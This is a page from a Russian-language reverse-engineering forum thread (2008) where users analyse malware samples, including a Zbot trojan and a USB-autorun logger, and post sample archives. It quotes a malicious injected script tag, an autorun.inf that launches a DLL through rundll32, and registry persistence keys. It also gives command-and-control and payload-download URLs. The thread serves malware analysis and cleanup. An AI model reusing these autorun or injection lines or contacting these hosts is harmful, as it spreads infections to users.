Сейчас на форуме: johnniewalker, Kybyx, testrev1337, bedop66938, vsv1 (+7 невидимых)

 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
<< 1 ... 27 . 28 . 29 . 30 . 31 . 32 . 33 . 34 . 35 . 36 . 37 ... 47 . 48 . >>
Посл.ответ Сообщение

Ранг: -0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 октября 2006 23:15 · Поправил: Модератор
· Личное сообщение · #1

В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.



Ранг: 1.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 04 марта 2008 18:58
· Личное сообщение · #2

Пыталось стартовать, якобы скринсейвер от фишки.нет извлекал


3b2d_04.03.2008_CRACKLAB.rU.tgz - h1.exe




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 04 марта 2008 19:28
· Личное сообщение · #3

Klever
На фишка частенько гавно впаривают! Либо сами админы либо им пох на то что они крутят на своем сайте. Бабла заплатят они и вставят хз какой ифрейм.

-----
Computer Security Laboratory




Ранг: 1.6 (гость)
Активность: 0=0
Статус: Участник

Создано: 04 марта 2008 22:45
· Личное сообщение · #4

[HEX] пишет:
Либо сами админы либо им пох на то что они крутят на своем сайте.


Не-а, урл то был другой, но оформление страничи - под фишки. Раскидывают в аську.




Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 04 марта 2008 22:50
· Личное сообщение · #5

так к пе-ид прилеплена гадость какая-то, у меня под виртуалкой на новый код не передавалось управление, так что хз что там именно)

-----
[nice coder and reverser]





Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 04 марта 2008 22:50
· Личное сообщение · #6

Мой сайт попал под трояна.. Вроде как.. К страничкам добавляется:

<script language="javascript" src="http://mainhome.2288.org/banner.js"></script>
Можно ли глянуть - сей скрипт (_http://mainhome.2288.org/banner.js) живой?

-----
программистом не рождаются - им умирают





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 04 марта 2008 23:43
· Личное сообщение · #7

Gambit
http://exelab.ru/f/action=vthread&forum=6&topic=11393

-----
Computer Security Laboratory





Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 06 марта 2008 21:58
· Личное сообщение · #8

А вот еще один наивный чукотский юноша

149e_06.03.2008_CRACKLAB.rU.tgz - helo.htm

-----
программистом не рождаются - им умирают




Ранг: 0.1 (гость)
Активность: 0=0
Статус: Участник

Создано: 07 марта 2008 05:20
· Личное сообщение · #9

Здравствуйте. Поймал бяку, регается на запуск сюда:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelay Load
как InprocServer32. Подгружается Explorer`ом, перехватывает подключение сьёмных устройств, пишет на них 3 файла - desktop.dll (себя же), autorun.inf (для запуска под Rundll32) и thumbs.dd (хз чё). При открытие диска срабатывает функция из длл InstallM и троянчик размножается.
Сам троян собирает что-то в temp, потом копирует в C:\WINDOWS\system32\mswmpdat.tlb. Логер кароче, но так и не понял за чем охотится. В стрингах есть такое livenews.ath.cx/update ./images/ index_16.jpg но что-то без ответа. Также похоже, что какая та часть текста зашифрована, потому что ключи регистров в дизасме странные. Вот такая Java Virtual Mashine




d8f1_06.03.2008_CRACKLAB.rU.tgz - mstmdm.dll




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 07 марта 2008 19:58 · Поправил: [HEX]
· Личное сообщение · #10

Yuge
Там строчки тупо поксорины на 0x55

Вот несколько строк поксореных еще разок на 0x55
GetPerAdapterInfo

GetAdaptersInfo

[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\desktop.dll,InstallM
shell\open\Default=1

Software\Microsoft\Windows\CurrentVersion\StrtdCfg


-----
Computer Security Laboratory





Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 07 марта 2008 22:32
· Личное сообщение · #11

Вот еще:
---------------------------------------------------------------------- ----------------------
Bы выйгpaли npиз, noлyчeниe здecь - www.kirunastyrkelyft.se/index2.html
---------------------------------------------------------------------- ----------------------

-----
программистом не рождаются - им умирают





Ранг: 990.2 (! ! !), 380thx
Активность: 0.680
Статус: Модератор
Author of DiE

Создано: 07 марта 2008 22:45
· Личное сообщение · #12

там простой редирект стоит

-----
[nice coder and reverser]





Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 07 марта 2008 22:50
· Личное сообщение · #13

фига се! А такой домен (.se) стоит 1700 рэ в год

хотя.. видимо, хозяева "Вип-Порно" могут себе это позволить..

-----
программистом не рождаются - им умирают




Ранг: 1.1 (гость)
Активность: 0=0
Статус: Участник

Создано: 10 марта 2008 12:54 · Поправил: nitsik
· Личное сообщение · #14

Размещал тему в разделе "Программирование", но ее закрыли. Модератор предложил разместить инфомацию тут:
"Многие знают о таком файловом обменнике letitbit.net. Так вот, при скачивании с него файлов требуется установить программу bitaccelerator, причем троянскую программу-рекламу. Читал тут (Слух: Ad-Ware подменяет выдачу "Яндекса") http://roem.ru/2008/02/03/addednews5231 , что программа заменяет поисковые запросы с яндекса, и вместо нужной страницы пользователь попадает на страницу рекламодателя. Таким образом владельцы Летитбита имеют неплохие бабки. У меня одно время стояла эта прога, но когда узнал, что это вирус, удалил ее. Хотелось бы знать, что на самом деле делает программка и какие данные отсылает её владельцу. (Кто хочет скачать bitaccelerator (еще раз предупреждаю - это троянская программа-реклама), могут воспользваться, например, этой ссылкой http://letitbit.net/download/555c16307371/Fantom.rar.html ). Заранее спасибо."




Ранг: 230.5 (наставник)
Активность: 0.180
Статус: Участник
Norg

Создано: 10 марта 2008 14:32
· Личное сообщение · #15

nitsikПоствил себе на другой тестовый комп,при поиске на яндексе действительно подменяет страницу,3 ссылка не соответствует запросу и написано все время про порно =)
Для скачки с летбита использую Portable bitaccelerator он вроде никуда ничего не прописывает,или просто скрипт из аттача Letitbit URL converter.hta
Берите,кому надо

d5a9_10.03.2008_CRACKLAB.rU.tgz - Letitbit URL converter.hta

-----
M&#225 enginn renna undan &#254v&#237 sem honum er skapa&#240




Ранг: 107.5 (ветеран)
Активность: 0.150
Статус: Участник

Создано: 10 марта 2008 16:56
· Личное сообщение · #16

Насчет вирусов - подхватил заразу (через иё) короче глупая шутка сама только меняет параметры безопастности виндовз. луизия - обозвал ее Dr Web. исправил все кроме одного пропал пункт создать и не могу создать папки. кто знает как вернуть это на место (вирус уже удален). Памагите пажайлуста.

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 10 марта 2008 18:55
· Личное сообщение · #17

Stack
www.hijackthis.de/en
или
www.z-oleg.com/secur/avz/download.php

помоему помагают востановить состояние в нормальный вид.

-----
Computer Security Laboratory




Ранг: 107.5 (ветеран)
Активность: 0.150
Статус: Участник

Создано: 10 марта 2008 20:03 · Поправил: Stack
· Личное сообщение · #18



-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74





Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 12 марта 2008 21:19 · Поправил: KingSise
· Личное сообщение · #19

87.118.110.78/prx2.exe
отправляет методом GET данные вот этому скрипту: 87.118.110.78/prxget.php?serv=

Переменные, передаваемые в запросе: "&cnt=", "&socks=", "&https="


Похоже на спам бота... Ну или что то связанное с прокси... ВМ варе слитала

-----
-=истина где-то рядом=-





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 12 марта 2008 23:06
· Личное сообщение · #20

KingSise
На ихнем сайте тажа ботва юзается что и тут обсуждали http://www.exelab.ru/f/action=vthread&forum=6&topic=11393

-----
Computer Security Laboratory





Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 17 марта 2008 10:24
· Личное сообщение · #21

свежачёк:
гавнапенч, каспер палит а нод молчит
пасс 1
убейте его хост)

3814_17.03.2008_CRACKLAB.rU.tgz - TheBestFebruary.rar

-----
AutoIt





Ранг: 271.6 (наставник), 2thx
Активность: 0.30
Статус: Участник

Создано: 17 марта 2008 10:25
· Личное сообщение · #22

это у нас хекц мастер убивать говнопинчевые хосты...

-----
iNTERNATiONAL CoDE CReW





Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

Создано: 17 марта 2008 10:37
· Личное сообщение · #23

странно то, что на анубисе он себя не проявляет (analysis.seclab.tuwien.ac.at), типа детектит его и молчком себя ведёт?

-----
AutoIt





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 17 марта 2008 11:58 · Поправил: [HEX]
· Личное сообщение · #24

OLEGator
Анубис помоему никогда пинчи не палил
Пользуйтесь другими аналогичными сервисами или пользуйтесь VM.

hxxp://barlineups.com/moneris/examples/gif/top.gif

-----
Computer Security Laboratory




Ранг: 38.3 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 21 марта 2008 23:17
· Личное сообщение · #25

from http://exelab.ru/f/action=vthread&forum=6&topic=11393

http://rapidshare.com/files/101290991/file.7z (40кб)
пасс: pass


Появился файл C:\WINDOWS\system32\ntos.exe и в реестре чувствую что-то лишнее

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\ntos. exe,"

На вирустотале всего 6 антивирусов палят.
http://www.virustotal.com/ru/analisis/85eff4a88cd0f1bdb5bd995c04bc57dd



Ранг: 107.5 (ветеран)
Активность: 0.150
Статус: Участник

Создано: 22 марта 2008 00:42 · Поправил: Stack
· Личное сообщение · #26

4t эх все изощреннее и изошронее становиться эта гадость.


вроде у тебя ента : ru.wikipedia.org/wiki/Вредоносная_программа

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74




Ранг: 309.8 (мудрец), 21thx
Активность: 0.170
Статус: Участник

Создано: 22 марта 2008 12:52
· Личное сообщение · #27

троян zeus с паблика у него)

-----
Shalom ebanats!




Ранг: 25.1 (посетитель)
Активность: 0.010
Статус: Участник

Создано: 22 марта 2008 14:49
· Личное сообщение · #28

> rapidshare.com/files/101290991/file.7z (40кб)

Перевыложите на ифолдер или иной любой, плз.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 22 марта 2008 15:01
· Личное сообщение · #29

RUNaum
hexcsl.com/upload/stats/863

-----
Computer Security Laboratory





Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 22 марта 2008 15:28
· Личное сообщение · #30

4t
Бот из семейства Zbot

Создает файлы:
1 %System%\ntos.exe 304,128 bytes 0xEEB73DBB15FC71EB139D0CFAB57E763B
2 %System%\wsnpoem\audio.dll 101 bytes 0x159474CEBABCF84B5E10578183CE529E
3 %System%\wsnpoem\video.dll 0 bytes 0xD41D8CD98F00B204E9800998ECF8427E

Внедряется в памяти с ледующие процессы:
services.exe %System%\services.exe 4,096 bytes
lsass.exe %System%\lsass.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
svchost.exe %System%\svchost.exe 4,096 bytes
alg.exe %System%\alg.exe 4,096 bytes

Создает:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network]
UID = "%ComputerName%_0001C7DF"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explore r]
{F710FA10-2031-3106-8872-93A2B5C5C620} = F7 09 F2 0D
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
userinit = "%System%\ntos.exe"

Модифицирует:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explore r\Shell Folders]
Cookies = "%System%\config\systemprofile\Cookies"
Cache = "%System%\config\systemprofile\Local Settings\Temporary Internet Files"
History = "%System%\config\systemprofile\Local Settings\History"

И то и другое для автозапуска.

От сюда тянет конфигурацию бота hxxp://www.amfitos.com/classes/cfg/cfg.bin

-----
Computer Security Laboratory




Ранг: 441.3 (мудрец), 297thx
Активность: 0.410.04
Статус: Участник

Создано: 22 марта 2008 16:13
· Личное сообщение · #31

У него сейчас какая-то новая разновидность, раньше эти файлы были видны, а теперь он скорее всего хучит FindFileNext и убирает себя из списка. Приходится лечить или с загрузочной компашки, или по сети с другого компа. [HEX], а ты не смотрел, что он вообще делает?


<< 1 ... 27 . 28 . 29 . 30 . 31 . 32 . 33 . 34 . 35 . 36 . 37 ... 47 . 48 . >>
 eXeL@B —› Крэки, обсуждения —› Исследование вирусов
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати